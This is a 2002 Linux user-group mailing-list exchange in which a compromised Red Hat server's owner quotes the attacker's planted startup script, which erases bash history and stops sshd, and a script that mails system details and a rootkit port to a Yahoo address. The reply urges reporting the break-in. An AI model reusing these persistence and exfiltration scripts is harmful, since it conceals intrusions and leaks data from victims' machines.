[lug] i got hacked

D. Stimits stimits at idcomm.com
Thu Apr 18 18:38:03 MDT 2002 

j davis wrote:
> 
> yahoo,
> i got hacked and there sending info to a yahoo account.....ryz_ro at yahoo.com
> look below....

Hope you actually sent it to abuse at yahoo.com, this one went to BLUG. Do
be certain to mention it was a criminal breakin, and that logs and data
should be preserved for police inquiries.

D. Stimits, stimits at idcomm.com

> 
> >From: "j davis" <davis_compz at hotmail.com>
> >Reply-To: lug at lug.boulder.co.us
> >To: lug at lug.boulder.co.us
> >Subject: [lug] i got hacked
> >Date: Thu, 18 Apr 2002 21:44:09 +0000
> >
> >
> >i have a box at a place i do contract work about 2 days a month.
> >today i could not ssh to it. so iwent on site and discoverd i got
> >hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
> >they exploited wu-ftpd
> >..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
> >yet.
> >anyway here is what i found in /etc/rc3.d/S52remote
> >
> >#!/bin/sh
> >
> >rm -rf /root/.bash_history
> >ln -s /dev/null /root/.bash_history
> >
> >cd /dev
> >./ryz -f ./s
> >/etc/rc.d/init.d/sshd stop
> >cd /
> >
> >/usr/bin/trimite
> >
> >then here is /usr/bin/trimite
> >
> >#!/bin/sh
> >
> >echo "* Info : $(uname -a)" >> /tmp/info
> >echo "* Hostname : $(hostname -f)" >> /tmp/info
> >echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> >echo "* Uptime : $(uptime)" >> /tmp/info
> >echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> >echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> >echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> >echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> >echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> >echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> >echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> >echo "* Portul rootkitului este 25897" >> /tmp/info
> >cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> >rm -f /tmp/info
> >
> >so, netstat says i have something listening on 25897...what should i do?!
> >never benn hacked before....i already turned off ftp and turned on tcp
> >wrappers.
> >
> >help please
> >jd

More information about the LUG mailing list